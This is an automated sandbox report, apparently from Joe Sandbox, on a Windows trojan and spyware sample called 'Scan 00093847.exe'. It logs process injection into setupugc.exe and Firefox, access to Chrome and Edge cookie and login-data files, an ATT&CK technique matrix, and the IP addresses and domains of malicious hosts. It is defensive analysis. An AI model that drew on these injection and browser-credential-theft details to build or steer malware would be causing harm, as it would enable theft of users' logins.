            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\Scan 00093847.exe Memory written: C:\Users\user\Desktop\Scan 00093847.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Scan 00093847.exe Section loaded: NULL target: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Scan 00093847.exe Section loaded: NULL target: C:\Windows\SysWOW64\setupugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\setupugc.exe Section loaded: NULL target: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe protection: read write
            Source: C:\Windows\SysWOW64\setupugc.exe Section loaded: NULL target: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\setupugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\setupugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\setupugc.exe Thread register set: target process: 1852
            Source: C:\Windows\SysWOW64\setupugc.exe Thread APC queued: target process: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
            Source: C:\Users\user\Desktop\Scan 00093847.exe Process created: C:\Users\user\Desktop\Scan 00093847.exe "C:\Users\user\Desktop\Scan 00093847.exe"
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe Process created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"
            Source: C:\Windows\SysWOW64\setupugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: uspEUeZyrqFDmi.exe, 00000008.00000002.3553279454.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000000.1984128442.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000000.2137797903.00000000010C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: uspEUeZyrqFDmi.exe, 00000008.00000002.3553279454.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000000.1984128442.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000000.2137797903.00000000010C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: uspEUeZyrqFDmi.exe, 00000008.00000002.3553279454.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000000.1984128442.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000000.2137797903.00000000010C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: uspEUeZyrqFDmi.exe, 00000008.00000002.3553279454.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000000.1984128442.0000000001510000.00000002.00000001.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000000.2137797903.00000000010C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Scan 00093847.exe | Queries volume information: C:\Users\user\Desktop\Scan 00093847.exe VolumeInformation
            Source: C:\Users\user\Desktop\Scan 00093847.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Scan 00093847.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Scan 00093847.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Scan 00093847.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara match | File source: 3.2.Scan 00093847.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.Scan 00093847.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\setupugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\setupugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 3.2.Scan 00093847.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.Scan 00093847.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            Behavior Graph ID: 1506403 | Sample: Scan 00093847.exe | Startdate: 07/09/2024 | Architecture: WINDOWS | Score: 100

            Source | Detection | Scanner | Label | Link
            Scan 00093847.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            Name | Malicious | Antivirus Detection | Reputation
            Name | Source | Malicious | Antivirus Detection | Reputation
                                          https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csssetupugc.exe, 00000009.00000002.3554601037.0000000004D3E000.00000004.10000000.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.00000000036DE000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.domeneshop.no/whoissetupugc.exe, 00000009.00000002.3554601037.00000000051F4000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000009.00000002.3556550859.0000000006C10000.00000004.00000800.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000003B94000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.urwpp.deDPleaseScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.zhongyicts.com.cnScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScan 00093847.exe, 00000000.00000002.1836424368.000000000307A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sakkal.comScan 00093847.exe, 00000000.00000002.1844565242.0000000005940000.00000004.00000020.00020000.00000000.sdmp, Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.domainnameshop.com/whoisuspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000003B94000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.apache.org/licenses/LICENSE-2.0Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.comScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icosetupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.ecosia.org/newtab/setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.carterandcone.comlScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://ac.ecosia.org/autocomplete?q=setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.founder.com.cn/cnScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.com/designers/frere-user.htmlScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.domainnameshop.com/setupugc.exe, 00000009.00000002.3554601037.00000000051F4000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000009.00000002.3556550859.0000000006C10000.00000004.00000800.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000003B94000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.com/designers8Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.masteriocp.online/wg84/?dxWljT6=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eisetupugc.exe, 00000009.00000002.3554601037.0000000004BAC000.00000004.10000000.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.000000000354C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IP | Domain | Country | ASN | ASN Name | Malicious
                                          162.0.213.94 | www.kryto.top | Canada | 35893 | ACPCA | true
                                          13.248.169.48 | www.dyme.tech | United States | 16509 | AMAZON-02US | true
                                          82.221.128.183 | nosr.net | Iceland | 50613 | THORDC-ASIS | true
                                          18.139.62.226 | dns.ladipage.com | United States | 16509 | AMAZON-02US | true
                                          217.160.0.127 | www.complexity.pub | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
                                          185.134.245.113 | www.lilibetmed.online | Norway | 12996 | DOMENESHOPOsloNorwayNO | true
                                          103.42.108.46 | www.mbwd.store | Australia | 45638 | SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU | true
                                          85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | true
                                          3.33.130.190 | angelenterprise.biz | United States | 8987 | AMAZONEXPANSIONGB | true
                                          Joe Sandbox version: 40.0.0 Tourmaline
                                          Analysis ID: 1506403
                                          Start date and time: 2024-09-07 21:41:50 +02:00
                                          Joe Sandbox product: CloudBasic
                                          Overall analysis duration: 0h 10m 49s
                                          Hypervisor based Inspection enabled: false
                                          Report type: full
                                          Cookbook file name: default.jbs
                                          Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Run name: Run with higher sleep bypass
                                          Number of analysed new started processes analysed: 12
                                          Number of new started drivers analysed: 0
                                          Number of existing processes analysed: 0
                                          Number of existing drivers analysed: 0
                                          Number of injected processes analysed: 2
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode: default
                                          Analysis stop reason: Timeout
                                          Sample name: Scan 00093847.exe
                                          Detection: MAL
                                          Classification: mal100.troj.spyw.evad.winEXE@10/7@13/9
                                          EGA Information:
                                          • Successful, ratio: 75%
                                          HCA Information:
                                          • Successful, ratio: 97%
                                          • Number of executed functions: 120
                                          • Number of non-executed functions: 267
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target uspEUeZyrqFDmi.exe, PID 4008 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: Scan 00093847.exe
                                          Time | Type | Description
